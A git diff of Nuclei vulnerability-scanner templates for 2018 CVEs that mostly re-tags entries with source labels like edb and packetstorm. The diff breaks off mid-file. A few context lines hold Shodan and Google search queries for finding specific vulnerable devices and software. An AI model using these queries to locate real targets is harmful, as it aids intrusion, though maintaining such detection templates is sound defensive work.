--- a/config/nuclei-templates/cves/2018/CVE-2018-11409.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-11409.yaml @@ -15,7 +15,7 @@ info: cvss-score: 5.3 cve-id: CVE-2018-11409 cwe-id: CWE-200 - tags: cve,cve2018,splunk + tags: edb,cve,cve2018,splunk requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-12031.yaml b/config/nuclei-templates/cves/2018/CVE-2018-12031.yaml index 4e98b1fb1..64ec20de3 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-12031.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-12031.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-12031 cwe-id: CWE-22 - tags: cve,cve2018,lfi + tags: edb,cve,cve2018,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-12054.yaml b/config/nuclei-templates/cves/2018/CVE-2018-12054.yaml index 99e020225..596bee81e 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-12054.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-12054.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2018-12054 cwe-id: CWE-22 - tags: cve,cve2018,lfi + tags: cve,cve2018,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-12095.yaml b/config/nuclei-templates/cves/2018/CVE-2018-12095.yaml index 1867ab4ba..5f70dc983 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-12095.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-12095.yaml @@ -15,7 +15,7 @@ info: cvss-score: 5.4 cve-id: CVE-2018-12095 cwe-id: CWE-79 - tags: cve,cve2018,xss + tags: cve,cve2018,xss,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-12613.yaml b/config/nuclei-templates/cves/2018/CVE-2018-12613.yaml index 795b9b734..2391066bf 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-12613.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-12613.yaml @@ -16,7 +16,7 @@ info: cvss-score: 8.8 cve-id: CVE-2018-12613 cwe-id: CWE-287 - tags: cve,cve2018,phpmyadmin,lfi + tags: vulhub,edb,cve,cve2018,phpmyadmin,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-12634.yaml b/config/nuclei-templates/cves/2018/CVE-2018-12634.yaml index 55841846f..85573f268 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-12634.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-12634.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-12634 cwe-id: CWE-200 - tags: cve,cve2018,scada,circontrol,circarlife,logs + tags: cve,cve2018,scada,circontrol,circarlife,logs,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-12998.yaml b/config/nuclei-templates/cves/2018/CVE-2018-12998.yaml index b8532f177..58fcddbf8 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-12998.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-12998.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2018-12998 cwe-id: CWE-79 - tags: cve,cve2018,zoho,xss,manageengine + tags: cve,cve2018,zoho,xss,manageengine,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-1335.yaml b/config/nuclei-templates/cves/2018/CVE-2018-1335.yaml index 7214f503f..59d3a5810 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-1335.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-1335.yaml @@ -16,7 +16,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2018-1335 - tags: cve,cve2018,apache,tika,rce + tags: edb,cve,cve2018,apache,tika,rce requests: - method: PUT diff --git a/config/nuclei-templates/cves/2018/CVE-2018-13980.yaml b/config/nuclei-templates/cves/2018/CVE-2018-13980.yaml index 40cfb44af..c116c9f86 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-13980.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-13980.yaml @@ -15,7 +15,7 @@ info: cvss-score: 5.5 cve-id: CVE-2018-13980 cwe-id: CWE-22 - tags: cve,cve2018,lfi + tags: cve,cve2018,lfi,edb,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-14064.yaml b/config/nuclei-templates/cves/2018/CVE-2018-14064.yaml index d8cf45f3a..d98119949 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-14064.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-14064.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-14064 cwe-id: CWE-22 - tags: cve,cve2018,lfi,camera,iot + tags: edb,cve,cve2018,lfi,camera,iot requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-14474.yaml b/config/nuclei-templates/cves/2018/CVE-2018-14474.yaml index a120704c6..65e39bbcd 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-14474.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-14474.yaml @@ -16,7 +16,7 @@ info: cvss-score: 6.1 cve-id: CVE-2018-14474 cwe-id: CWE-601 - tags: cve,cve2018,redirect,orangeforum,oss + tags: cve2018,redirect,orangeforum,oss,seclists,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-14728.yaml b/config/nuclei-templates/cves/2018/CVE-2018-14728.yaml index ab3eb8810..7b0b0a984 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-14728.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-14728.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-14728 cwe-id: CWE-918 - tags: cve,cve2018,ssrf,lfi + tags: cve,cve2018,ssrf,lfi,packetstorm,edb requests: - method: POST diff --git a/config/nuclei-templates/cves/2018/CVE-2018-14916.yaml b/config/nuclei-templates/cves/2018/CVE-2018-14916.yaml index 5f54fb11c..c3c07b6c0 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-14916.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-14916.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.1 cve-id: CVE-2018-14916 cwe-id: CWE-732 - tags: cve,cve2018,loytec,lfi + tags: cve2018,loytec,lfi,packetstorm,seclists,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-14918.yaml b/config/nuclei-templates/cves/2018/CVE-2018-14918.yaml index 45c567763..4c7590501 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-14918.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-14918.yaml @@ -18,7 +18,7 @@ info: metadata: shodan-query: http.html:"LGATE-902" verified: "true" - tags: cve,cve2018,lgate,loytec,lfi + tags: loytec,lfi,seclists,packetstorm,cve,cve2018,lgate requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-15138.yaml b/config/nuclei-templates/cves/2018/CVE-2018-15138.yaml index 7de14fe8b..66de15d9a 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-15138.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-15138.yaml @@ -14,7 +14,7 @@ info: cvss-score: 7.5 cve-id: CVE-2018-15138 cwe-id: CWE-22 - tags: cve,cve2018,ericsson,lfi,traversal + tags: cve,cve2018,ericsson,lfi,traversal,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-15517.yaml b/config/nuclei-templates/cves/2018/CVE-2018-15517.yaml index 8e37ed929..dba6b4884 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-15517.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-15517.yaml @@ -15,7 +15,7 @@ info: cvss-score: 8.6 cve-id: CVE-2018-15517 cwe-id: CWE-918 - tags: cve,cve2018,dlink,ssrf,oast + tags: seclists,packetstorm,cve,cve2018,dlink,ssrf,oast requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-15535.yaml b/config/nuclei-templates/cves/2018/CVE-2018-15535.yaml index b46a2213b..dc43fc3af 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-15535.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-15535.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2018-15535 cwe-id: CWE-22 - tags: cve,cve2018,lfi + tags: cve,cve2018,lfi,edb,seclists requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-15745.yaml b/config/nuclei-templates/cves/2018/CVE-2018-15745.yaml index 42b102822..cfc970e20 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-15745.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-15745.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.5 cve-id: CVE-2018-15745 cwe-id: CWE-22 - tags: cve,cve2018,argussurveillance,lfi,dvr + tags: packetstorm,edb,cve,cve2018,argussurveillance,lfi,dvr requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-16059.yaml b/config/nuclei-templates/cves/2018/CVE-2018-16059.yaml index 1502baf4b..1231fa357 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-16059.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-16059.yaml @@ -15,7 +15,7 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16059 cwe-id: CWE-22 - tags: cve,cve2018,iot,lfi + tags: cve,cve2018,iot,lfi,edb requests: - method: POST diff --git a/config/nuclei-templates/cves/2018/CVE-2018-16133.yaml b/config/nuclei-templates/cves/2018/CVE-2018-16133.yaml index 67d03b9f1..3603632a5 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-16133.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-16133.yaml @@ -16,7 +16,7 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16133 cwe-id: CWE-22 - tags: cve,cve2018,cybrotech,lfi + tags: lfi,packetstorm,cve,cve2018,cybrotech requests: - raw: diff --git a/config/nuclei-templates/cves/2018/CVE-2018-16167.yaml b/config/nuclei-templates/cves/2018/CVE-2018-16167.yaml index 11a6ae97f..289d39253 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-16167.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-16167.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-16167 cwe-id: CWE-78 - tags: cve,cve2018,logontracer,rce,oast + tags: rce,oast,edb,cve,cve2018,logontracer requests: - raw: diff --git a/config/nuclei-templates/cves/2018/CVE-2018-16283.yaml b/config/nuclei-templates/cves/2018/CVE-2018-16283.yaml index 4c485ff4b..ee97c7633 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-16283.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-16283.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-16283 cwe-id: CWE-22 - tags: cve,cve2018,wordpress,wp-plugin,lfi + tags: edb,seclists,cve,cve2018,wordpress,wp-plugin,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-16288.yaml b/config/nuclei-templates/cves/2018/CVE-2018-16288.yaml index f57f00b8e..55c71c27a 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-16288.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-16288.yaml @@ -15,7 +15,7 @@ info: cvss-score: 8.6 cve-id: CVE-2018-16288 cwe-id: CWE-200 - tags: cve,cve2018,lfi,supersign + tags: cve,cve2018,lfi,supersign,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-16299.yaml b/config/nuclei-templates/cves/2018/CVE-2018-16299.yaml index b7e1f3135..7f56baa72 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-16299.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-16299.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.5 cve-id: CVE-2018-16299 cwe-id: CWE-22 - tags: cve,cve2018,wordpress,lfi,plugin,wp + tags: wordpress,lfi,plugin,wp,edb,packetstorm,cve,cve2018 requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-16668.yaml b/config/nuclei-templates/cves/2018/CVE-2018-16668.yaml index a4af5ea5a..be05af0d7 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-16668.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-16668.yaml @@ -14,7 +14,7 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16668 cwe-id: CWE-287 - tags: cve,cve2018,circarlife,scada,iot,disclosure + tags: cve,cve2018,circarlife,scada,iot,disclosure,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-16670.yaml b/config/nuclei-templates/cves/2018/CVE-2018-16670.yaml index bf69edf1c..d10487f08 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-16670.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-16670.yaml @@ -14,7 +14,7 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16670 cwe-id: CWE-287 - tags: cve,cve2018,circarlife,scada,plc,iot,disclosure + tags: scada,plc,iot,disclosure,edb,cve,cve2018,circarlife requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-16671.yaml b/config/nuclei-templates/cves/2018/CVE-2018-16671.yaml index 9a3d84bf1..ac48bb33d 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-16671.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-16671.yaml @@ -14,7 +14,7 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16671 cwe-id: CWE-200 - tags: cve,cve2018,circarlife,scada,iot,disclosure + tags: iot,disclosure,edb,cve,cve2018,circarlife,scada requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-16763.yaml b/config/nuclei-templates/cves/2018/CVE-2018-16763.yaml index 773df02e1..a909a8ad5 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-16763.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-16763.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-16763 cwe-id: CWE-74 - tags: cve,cve2018,fuelcms,rce + tags: cve,cve2018,fuelcms,rce,edb requests: - raw: diff --git a/config/nuclei-templates/cves/2018/CVE-2018-16836.yaml b/config/nuclei-templates/cves/2018/CVE-2018-16836.yaml index 87db214d7..259bf3e4f 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-16836.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-16836.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-16836 cwe-id: CWE-22 - tags: cve,cve2018,rubedo,lfi + tags: cve,cve2018,rubedo,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-17246.yaml b/config/nuclei-templates/cves/2018/CVE-2018-17246.yaml index e4a5e3b90..a00e5bbc3 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-17246.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-17246.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-17246 cwe-id: CWE-829 - tags: cve,cve2018,lfi,kibana + tags: cve,cve2018,lfi,kibana,vulhub requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-17254.yaml b/config/nuclei-templates/cves/2018/CVE-2018-17254.yaml index 348c3260b..edbb1e3ff 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-17254.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-17254.yaml @@ -14,7 +14,7 @@ info: cve-id: CVE-2018-17254 cwe-id: CWE-89 remediation: Update or remove the affected plugin. - tags: joomla,sqli,cve,cve2018 + tags: cve,cve2018,packetstorm,edb,joomla,sqli requests: - raw: diff --git a/config/nuclei-templates/cves/2018/CVE-2018-17431.yaml b/config/nuclei-templates/cves/2018/CVE-2018-17431.yaml index d8175df08..b9b6edfa0 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-17431.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-17431.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-17431 cwe-id: CWE-287 - tags: cve,cve2018,comodo,rce + tags: cve2018,comodo,rce,edb,cve requests: - raw: diff --git a/config/nuclei-templates/cves/2018/CVE-2018-18323.yaml b/config/nuclei-templates/cves/2018/CVE-2018-18323.yaml index b2774656a..c2584cfb9 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-18323.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-18323.yaml @@ -17,7 +17,7 @@ info: cvss-score: 7.5 cve-id: CVE-2018-18323 cwe-id: CWE-22 - tags: cve,cve2018,centos,lfi + tags: cve,cve2018,centos,lfi,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-18775.yaml b/config/nuclei-templates/cves/2018/CVE-2018-18775.yaml index 68a5f2507..c796734f4 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-18775.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-18775.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2018-18775 cwe-id: CWE-79 - tags: cve,cve2018,microstrategy,xss + tags: cve2018,microstrategy,xss,edb,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-18777.yaml b/config/nuclei-templates/cves/2018/CVE-2018-18777.yaml index 98e918f51..bd8f74950 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-18777.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-18777.yaml @@ -15,7 +15,7 @@ info: cvss-score: 4.3 cve-id: CVE-2018-18777 cwe-id: CWE-22 - tags: cve,cve2018,microstrategy,lfi,traversal + tags: traversal,edb,packetstorm,cve,cve2018,microstrategy,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-18925.yaml b/config/nuclei-templates/cves/2018/CVE-2018-18925.yaml index 18d0bc1a4..157abc044 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-18925.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-18925.yaml @@ -16,7 +16,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-18925 cwe-id: CWE-384 - tags: cve,cve2018,gogs,lfi,rce + tags: gogs,lfi,rce,vulhub,cve,cve2018 requests: - raw: diff --git a/config/nuclei-templates/cves/2018/CVE-2018-19136.yaml b/config/nuclei-templates/cves/2018/CVE-2018-19136.yaml index 56ad386b5..8f624d51b 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-19136.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-19136.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2018,domainmod,xss,authenticated + tags: edb,cve,cve2018,domainmod,xss,authenticated requests: - raw: diff --git a/config/nuclei-templates/cves/2018/CVE-2018-19326.yaml b/config/nuclei-templates/cves/2018/CVE-2018-19326.yaml index f2491cfed..6ca88c667 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-19326.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-19326.yaml @@ -20,7 +20,7 @@ info: metadata: verified: true shodan-query: http.html:"VMG1312-B10D" - tags: cve,cve2018,zyxel,lfi,modem,router + tags: lfi,modem,router,edb,cve,cve2018,zyxel requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-19439.yaml b/config/nuclei-templates/cves/2018/CVE-2018-19439.yaml index 5b82c57b6..820f9ea60 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-19439.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-19439.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2018-19439 cwe-id: CWE-79 - tags: cve,cve2018,oracle,xss + tags: oracle,xss,seclists,packetstorm,cve,cve2018 requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-19458.yaml b/config/nuclei-templates/cves/2018/CVE-2018-19458.yaml index df88a3222..f815a04a9 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-19458.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-19458.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.5 cve-id: CVE-2018-19458 cwe-id: CWE-287 - tags: cve,cve2018,lfi,proxy + tags: edb,cve,cve2018,lfi,proxy requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-19749.yaml b/config/nuclei-templates/cves/2018/CVE-2018-19749.yaml index e7bea6748..6dd0a2deb 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-19749.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-19749.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2018,domainmod,xss,authenticated + tags: cve,cve2018,domainmod,xss,authenticated,edb requests: - raw: diff --git a/config/nuclei-templates/cves/2018/CVE-2018-19751.yaml b/config/nuclei-templates/cves/2018/CVE-2018-19751.yaml index 7eecd7175..b12be30f5 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-19751.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-19751.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2018,domainmod,xss,authenticated + tags: cve,cve2018,domainmod,xss,authenticated,edb requests: - raw: diff --git a/config/nuclei-templates/cves/2018/CVE-2018-19752.yaml b/config/nuclei-templates/cves/2018/CVE-2018-19752.yaml index 294f1d656..254ad5d37 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-19752.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-19752.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2018,domainmod,xss,authenticated + tags: cve,cve2018,domainmod,xss,authenticated,edb requests: - raw: diff --git a/config/nuclei-templates/cves/2018/CVE-2018-19753.yaml b/config/nuclei-templates/cves/2018/CVE-2018-19753.yaml index 2ca7cc559..71b9d24fd 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-19753.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-19753.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.5 cve-id: CVE-2018-19753 cwe-id: CWE-22 - tags: cve,cve2018,tarantella,lfi + tags: packetstorm,seclists,cve,cve2018,tarantella,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-19877.yaml b/config/nuclei-templates/cves/2018/CVE-2018-19877.yaml index debc1c65b..70de43fed 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-19877.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-19877.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2018,adiscon,xss + tags: adiscon,xss,edb,cve,cve2018 requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-19892.yaml b/config/nuclei-templates/cves/2018/CVE-2018-19892.yaml index 81ee180a2..7dfa6eec9 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-19892.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-19892.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2018,domainmod,xss,authenticated + tags: cve2018,domainmod,xss,authenticated,edb,cve requests: - raw: diff --git a/config/nuclei-templates/cves/2018/CVE-2018-19914.yaml b/config/nuclei-templates/cves/2018/CVE-2018-19914.yaml index e0f9c15c7..fd4e1321c 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-19914.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-19914.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2018,domainmod,xss,authenticated + tags: cve2018,domainmod,xss,authenticated,edb,cve requests: - raw: diff --git a/config/nuclei-templates/cves/2018/CVE-2018-19915.yaml b/config/nuclei-templates/cves/2018/CVE-2018-19915.yaml index cc7c86933..a15d39748 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-19915.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-19915.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2018,domainmod,xss,authenticated + tags: domainmod,xss,authenticated,edb,cve,cve2018 requests: - raw: diff --git a/config/nuclei-templates/cves/2018/CVE-2018-20009.yaml b/config/nuclei-templates/cves/2018/CVE-2018-20009.yaml index 81614ef65..7596d057d 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-20009.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-20009.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2018,domainmod,xss,authenticated + tags: domainmod,xss,authenticated,edb,cve,cve2018 requests: - raw: diff --git a/config/nuclei-templates/cves/2018/CVE-2018-20010.yaml b/config/nuclei-templates/cves/2018/CVE-2018-20010.yaml index 1b78cd283..cae5c83fa 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-20010.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-20010.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2018,domainmod,xss,authenticated + tags: domainmod,xss,authenticated,edb,cve,cve2018 requests: - raw: diff --git a/config/nuclei-templates/cves/2018/CVE-2018-20011.yaml b/config/nuclei-templates/cves/2018/CVE-2018-20011.yaml index 03b42fdb8..a0245139b 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-20011.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-20011.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve1028,domainmod,xss,authenticated + tags: domainmod,xss,authenticated,edb,cve,cve1028 requests: - raw: diff --git a/config/nuclei-templates/cves/2018/CVE-2018-20463.yaml b/config/nuclei-templates/cves/2018/CVE-2018-20463.yaml index f6060da44..edd0c3351 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-20463.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-20463.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-22 metadata: verified: "true" - tags: cve,cve2018,traversal,wp,wp-plugin,wordpress,jsmol2wp + tags: wp,wp-plugin,wordpress,jsmol2wp,wpscan,cve,cve2018,traversal requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-20470.yaml b/config/nuclei-templates/cves/2018/CVE-2018-20470.yaml index 913e599c3..104953b28 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-20470.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-20470.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2018-20470 cwe-id: CWE-22 - tags: cve,cve2018,lfi + tags: cve,cve2018,lfi,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-20526.yaml b/config/nuclei-templates/cves/2018/CVE-2018-20526.yaml index ad375fdbb..240a00afd 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-20526.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-20526.yaml @@ -19,7 +19,7 @@ info: metadata: google-dork: intitle:"Roxy file manager" verified: "true" - tags: cve,cve2018,roxy,fileman,rce,upload,intrusive + tags: cve,cve2018,roxy,fileman,rce,upload,intrusive,packetstorm,edb requests: - raw: diff --git a/config/nuclei-templates/cves/2018/CVE-2018-2392.yaml b/config/nuclei-templates/cves/2018/CVE-2018-2392.yaml index 1b7305118..356ea84e7 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-2392.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-2392.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.5 cve-id: CVE-2018-2392 cwe-id: CWE-611 - tags: cve,cve2018,sap,igs,xxe,xmlchart + tags: cve,cve2018,sap,igs,xxe,xmlchart,msf requests: - raw: diff --git a/config/nuclei-templates/cves/2018/CVE-2018-2791.yaml b/config/nuclei-templates/cves/2018/CVE-2018-2791.yaml index b39dca182..dd33b5bb9 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-2791.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-2791.yaml @@ -16,7 +16,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N cvss-score: 8.2 cve-id: CVE-2018-2791 - tags: cve,cve2018,oracle,xss,wcs + tags: edb,cve,cve2018,oracle,xss,wcs requests: - raw: diff --git a/config/nuclei-templates/cves/2018/CVE-2018-2894.yaml b/config/nuclei-templates/cves/2018/CVE-2018-2894.yaml index 06c12a559..b0e0bed17 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-2894.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-2894.yaml @@ -15,7 +15,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-2894 - tags: cve,cve2018,oracle,weblogic,rce + tags: cve2018,oracle,weblogic,rce,vulhub,cve requests: - raw: diff --git a/config/nuclei-templates/cves/2018/CVE-2018-3714.yaml b/config/nuclei-templates/cves/2018/CVE-2018-3714.yaml index a03a87505..9e5d13f0b 100644 --- 